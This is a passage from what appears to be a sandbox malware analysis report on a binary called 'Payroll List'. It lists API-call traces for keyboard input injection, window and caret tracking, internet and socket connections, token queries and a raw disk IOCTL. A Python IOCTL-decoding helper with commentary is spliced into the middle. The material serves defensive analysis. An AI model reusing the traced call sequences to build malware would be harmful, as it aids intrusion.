                                                                    • Opcode Fuzzy Hash: 81ce5ebe6ab9f8dcb932ea5d829be5822cc13b13dcf6f8a06fb3b3c6b7dc218d
                                                                    • Instruction Fuzzy Hash: 63411670E04648AEEF248B64CC09BFDBBB9AB55315F04015AF4E2932C1C7B48EA5DB65
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0018B5D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: dc09e83782529aed542a272754b68e1c5e921f5222816233451e87cd795dd904
                                                                    • Instruction ID: 49a13a77e4c06c49f2123f992e8f9cce3c327f0e052c974fee27643fc2f329c4
                                                                    • Opcode Fuzzy Hash: dc09e83782529aed542a272754b68e1c5e921f5222816233451e87cd795dd904
                                                                    • Instruction Fuzzy Hash: 8431E074608204BFEF34AF58DCC9FAC7B65AB06310F644201FA52D66E1E730AB808F51
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 0018D807
                                                                    • GetWindowRect.USER32(?,?), ref: 0018D87D
                                                                    • PtInRect.USER32(?,?,0018ED5A), ref: 0018D88D
                                                                    • MessageBeep.USER32(00000000), ref: 0018D8FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: e77a77892410b262a4c36db6cbe42afceca20113c2435613926fd073608c3aad
                                                                    • Instruction ID: f9f585d5709f02904f00b29aa9aec1bae3ef4841116fa8aa898a80ce7dd09ec0
                                                                    • Opcode Fuzzy Hash: e77a77892410b262a4c36db6cbe42afceca20113c2435613926fd073608c3aad
                                                                    • Instruction Fuzzy Hash: 54418F70A00258EFCB11EF99E884BAD7BF5FB4A314F1981A9E5159B690D730EA81CF40
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00163AB8
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00163AD4
                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00163B34
                                                                    • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00163B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: e2d419d45f9cab0a3f692fc89f7ddd1453961974e659101b81744ab4a10892fe
                                                                    • Instruction ID: 710e9d157b2b84ab893bce2359f81ed30e4134975694b5af18bfe0a93e5cbf38
                                                                    • Opcode Fuzzy Hash: e2d419d45f9cab0a3f692fc89f7ddd1453961974e659101b81744ab4a10892fe
                                                                    • Instruction Fuzzy Hash: 1E313670E00658AEFF348BA4CC19BFEBBB99B56310F04015AE892932D1C7758FA5D761
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00154038
                                                                    • __isleadbyte_l.LIBCMT ref: 00154066
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00154094
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001540CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 7684ab08638703970283e67907a889386b421511f4dc827deb53018a95846939
                                                                    • Instruction ID: a7d93d6055674bb1cf9d31ebd47189da43d3447545568502f92f7917d07aa7c6
                                                                    • Opcode Fuzzy Hash: 7684ab08638703970283e67907a889386b421511f4dc827deb53018a95846939
                                                                    • Instruction Fuzzy Hash: E331CE30604206EFDB219F65C844BEA7BA5BF41316F254128FA618F0E0E731D8E8DB90
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00187CB9
                                                                      • Part of subcall function 00165F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00165F6F
                                                                      • Part of subcall function 00165F55: GetCurrentThreadId.KERNEL32 ref: 00165F76
                                                                      • Part of subcall function 00165F55: AttachThreadInput.USER32(00000000,?,0016781F), ref: 00165F7D
                                                                    • GetCaretPos.USER32(?), ref: 00187CCA
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00187D03
                                                                    • GetForegroundWindow.USER32 ref: 00187D09
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 1e30d3d13d6b0f02b9a3392d02e5c104b7b3b959ccb4cce246dfc92d4c481024
                                                                    • Instruction ID: 13ab99fcc562ac23077f8b177b9623204e40f6793d892986b683b4f67bd2b4b8
                                                                    • Opcode Fuzzy Hash: 1e30d3d13d6b0f02b9a3392d02e5c104b7b3b959ccb4cce246dfc92d4c481024
                                                                    • Instruction Fuzzy Hash: 5E31FE71900108AFDB10EFA5DC459EFBBF9EF69314F118466E819E7211DB319E458BA0
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • GetCursorPos.USER32(?), ref: 0018F211
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0019E4C0,?,?,?,?,?), ref: 0018F226
                                                                    • GetCursorPos.USER32(?), ref: 0018F270
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0019E4C0,?,?,?), ref: 0018F2A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: 8e60edc3fedc92a303286eeb55faf3b34607f2eeac0255ad110c10d6858b6fb8
                                                                    • Instruction ID: e5e4fd85a0adb6d374b96df96b797072ed76a479115748871578acf3280695ab
                                                                    • Opcode Fuzzy Hash: 8e60edc3fedc92a303286eeb55faf3b34607f2eeac0255ad110c10d6858b6fb8
                                                                    • Instruction Fuzzy Hash: D2219139600518BFCB159F94D898EEEBBB6FF0A750F084069F9055B6A1D3309E92DF60
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00174358
                                                                      • Part of subcall function 001743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174401
                                                                      • Part of subcall function 001743E2: InternetCloseHandle.WININET(00000000), ref: 0017449E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 1463438336-0
                                                                    • Opcode ID: bdd4a76e68d0873c98534d9b26829389aa485937e00d0b71b181fd5abd464b50
                                                                    • Instruction ID: 406b0b3f13728b049b5fa125779695364549ba695ff4aee66b6a33a4972959ad
                                                                    • Opcode Fuzzy Hash: bdd4a76e68d0873c98534d9b26829389aa485937e00d0b71b181fd5abd464b50
                                                                    • Instruction Fuzzy Hash: 7321F631200A11BFDB169F60DC01FBBB7B9FF54714F10801AFA5D96A50DB7198609B90
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00188AA6
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00188AC0
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00188ACE
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00188ADC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: cd2c3ce5afd99a7d3fdce39e5fbe49a9387cf6bf8a3a8ff7621fa51df5b2277f
                                                                    • Instruction ID: 85ef353b3d34a3892d3b904dd472409d1b3907f0b1803539f609feca321d5dcb
                                                                    • Opcode Fuzzy Hash: cd2c3ce5afd99a7d3fdce39e5fbe49a9387cf6bf8a3a8ff7621fa51df5b2277f
                                                                    • Instruction Fuzzy Hash: DB11E231305520AFDB18AB18EC05FBE7799FF9A320F144119F816C76E2CB74AD508B90
                                                                    APIs
                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00178AE0
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00178AF2
                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00178AFF
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178B16
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastacceptselect
                                                                    • String ID:
                                                                    • API String ID: 385091864-0
                                                                    • Opcode ID: caa4d6084baa66204affdb95f68fab71fff294bd63bd6d96af598dac50811c3e
                                                                    • Instruction ID: 06f5e5e23e787713e7fb9c7a372e623ac0ea9e5c8d700ad82095e8a042b09f2b
                                                                    • Opcode Fuzzy Hash: caa4d6084baa66204affdb95f68fab71fff294bd63bd6d96af598dac50811c3e
                                                                    • Instruction Fuzzy Hash: EB21A872A001249FC7159F68DC85A9EBBFCEF5A314F008169F84AD7651DB74D981CF90
                                                                    APIs
                                                                      • Part of subcall function 00161E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00160ABB,?,?,?,0016187A,00000000,000000EF,00000119,?,?), ref: 00161E77
                                                                      • Part of subcall function 00161E68: lstrcpyW.KERNEL32(00000000,?,?,00160ABB,?,?,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00161E9D
                                                                      • Part of subcall function 00161E68: lstrcmpiW.KERNEL32(00000000,?,00160ABB,?,?,?,0016187A,00000000,000000EF,00000119,?,?), ref: 00161ECE
                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00160AD4
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00160AFA
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00160B2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: 9d868993641b7b0733bf93e8894af52bb45d48f4b8e516d0f277d5035229679a
                                                                    • Instruction ID: c216dd3ce8eb1f8456f4aaaaa6f26e2fde86e0620982f2268aac37345ea0882c
                                                                    • Opcode Fuzzy Hash: 9d868993641b7b0733bf93e8894af52bb45d48f4b8e516d0f277d5035229679a
                                                                    • Instruction Fuzzy Hash: 7611963A200305AFDB269F24DC45D7A77A9FF59354F80806AE806CB250EB71D851D7E1
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00152FB5
                                                                      • Part of subcall function 0014395C: __FF_MSGBANNER.LIBCMT ref: 00143973
                                                                      • Part of subcall function 0014395C: __NMSG_WRITE.LIBCMT ref: 0014397A
                                                                      • Part of subcall function 0014395C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000001,00000000,?,?,0013F507,?,0000000E), ref: 0014399F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 2b5be5eda4fc73cf55df12f98e2df7c91207e23a71ac943c210ceba53154932c
                                                                    • Instruction ID: e7ff8ae5ae6a45885446fe151d00b159b9329b3167e2def1237d9b6a6550502a
                                                                    • Opcode Fuzzy Hash: 2b5be5eda4fc73cf55df12f98e2df7c91207e23a71ac943c210ceba53154932c
                                                                    • Instruction Fuzzy Hash: 9411E732508312EBCF223FB0FC4466A3BA4AF253A1F204425FC699F1E1DB34C9848690
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001605AC
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001605C7
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001605DD
                                                                    • FreeLibrary.KERNEL32(?), ref: 00160632
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                    • String ID:
                                                                    • API String ID: 3137044355-0
                                                                    • Opcode ID: fa7d9036a178d6e3228273d757cf86cddb04f790b5ee3c2277ad3b82cb8ca11c
                                                                    • Instruction ID: cd0e947e5fceaa986e8f118ffb76faf6521dac25b5fef577bfb97ef52c979341
                                                                    • Opcode Fuzzy Hash: fa7d9036a178d6e3228273d757cf86cddb04f790b5ee3c2277ad3b82cb8ca11c
                                                                    • Instruction Fuzzy Hash: 4E218E71901209EFDB228F95EC88ADBBBB8EF48700F01846DE51796550D770EA65DF50
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00166733
                                                                    • _memset.LIBCMT ref: 00166754
                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001667A6
                                                                    • CloseHandle.KERNEL32(00000000), ref: 001667AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                    • String ID:
                                                                    • API String ID: 1157408455-0
                                                                    • Opcode ID: 0be0dc2f2c42436596ba48fb9b139c996e814838778acb2334a3996b92c47300
                                                                    • Instruction ID: db920fe0c33d9fbaeaf713d08c104f03a29fc870379799b0ab432a304608c9c3
                                                                    • Opcode Fuzzy Hash: 0be0dc2f2c42436596ba48fb9b139c996e814838778acb2334a3996b92c47300
                                                                    • Instruction Fuzzy Hash: 6B1106B29012287AE7209BA5AC4DFABBABCEF45724F10419AF505E71D0D3704E80CBA4
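The function above opens a handle with CreateFileW (desired access C0000000, share mode 3, OPEN_EXISTING) and then issues DeviceIoControl with control code 0004D02C and two 0x200-byte buffers. The control code is the only part of that sequence that needs decoding. The helper below is an added example, not part of the Joe Sandbox report: it splits a Windows IOCTL into the fields of the CTL_CODE macro (device type, required access, function number, buffering method) and looks it up in a small table of storage-related codes whose definitions are taken from the SDK headers winioctl.h and ntddscsi.h. It also checks whether the access the handle was opened with satisfies the access bits the IOCTL demands, which is why this call needs GENERIC_READ | GENERIC_WRITE. The table of named codes is the only assumption beyond the macro itself; any code outside it is reported as unknown rather than guessed.

```python
"""Decode a Windows IOCTL control code (added example, not part of the report).

CTL_CODE(DeviceType, Function, Method, Access) =
    (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
as defined in winioctl.h.  The named codes below are built from the same
macro with the parameters from winioctl.h / ntddscsi.h.
"""

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000

FILE_DEVICE_CONTROLLER = 0x04    # IOCTL_SCSI_BASE
FILE_DEVICE_DISK = 0x07          # IOCTL_DISK_BASE
FILE_DEVICE_MASS_STORAGE = 0x2D  # IOCTL_STORAGE_BASE

DEVICE_TYPES = {
    FILE_DEVICE_CONTROLLER: "FILE_DEVICE_CONTROLLER",
    FILE_DEVICE_DISK: "FILE_DEVICE_DISK",
    FILE_DEVICE_MASS_STORAGE: "FILE_DEVICE_MASS_STORAGE",
}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Pack the four CTL_CODE fields into a 32-bit control code."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> dict:
    """Unpack a control code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


# Storage IOCTLs an analyst commonly meets in disk/serial fingerprinting code.
# Values are derived from the macro, so each entry follows from the header
# definition (base, function number, method, access) rather than a literal.
KNOWN_IOCTLS = {
    ctl_code(FILE_DEVICE_CONTROLLER, 0x401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x402, 0, 3): "IOCTL_SCSI_MINIPORT",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x40B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(FILE_DEVICE_DISK, 0x000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(FILE_DEVICE_DISK, 0x022, 0, 3): "SMART_RCV_DRIVE_DATA",
    ctl_code(FILE_DEVICE_MASS_STORAGE, 0x500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


def name_of(code: int) -> str:
    """Symbolic name for a control code, or 'unknown' if not in the table."""
    return KNOWN_IOCTLS.get(code, "unknown")


def handle_access_ok(desired_access: int, code: int) -> bool:
    """True if a handle opened with dwDesiredAccess (GENERIC_* bits only)
    carries the read/write rights the IOCTL's access field requires."""
    need = decode_ioctl(code)["access"]
    has_read = bool(desired_access & GENERIC_READ)
    has_write = bool(desired_access & GENERIC_WRITE)
    if need & 1 and not has_read:
        return False
    if need & 2 and not has_write:
        return False
    return True


def describe(code: int) -> str:
    """One-line human-readable breakdown of a control code."""
    f = decode_ioctl(code)
    return "0x%X: %s, function 0x%X, %s, %s -> %s" % (
        code,
        DEVICE_TYPES.get(f["device_type"], "device 0x%X" % f["device_type"]),
        f["function"],
        METHODS[f["method"]],
        ACCESS[f["access"]],
        name_of(code),
    )


if __name__ == "__main__":
    # Values taken from the CreateFileW / DeviceIoControl lines in the listing.
    print(describe(0x4D02C))
    print("handle access sufficient:", handle_access_ok(0xC0000000, 0x4D02C))
```

Running the script on the listing's values reports the code as IOCTL_ATA_PASS_THROUGH with FILE_READ_ACCESS|FILE_WRITE_ACCESS, which is consistent with the handle having been opened with C0000000 (GENERIC_READ | GENERIC_WRITE). With the two-bit access field set to read and write, a handle opened for GENERIC_READ alone would fail this IOCTL, so the CreateFileW flags and the control code corroborate each other.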
                                                                    APIs
                                                                      • Part of subcall function 0015AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0015AA79
                                                                      • Part of subcall function 0015AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0015AA83
                                                                      • Part of subcall function 0015AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0015AA92
                                                                      • Part of subcall function 0015AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0015AA99
                                                                      • Part of subcall function 0015AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0015AAAF
                                                                    • GetLengthSid.ADVAPI32(?,00000000,0015ADE4,?,?), ref: 0015B21B
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0015B227
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0015B22E
                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0015B247
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
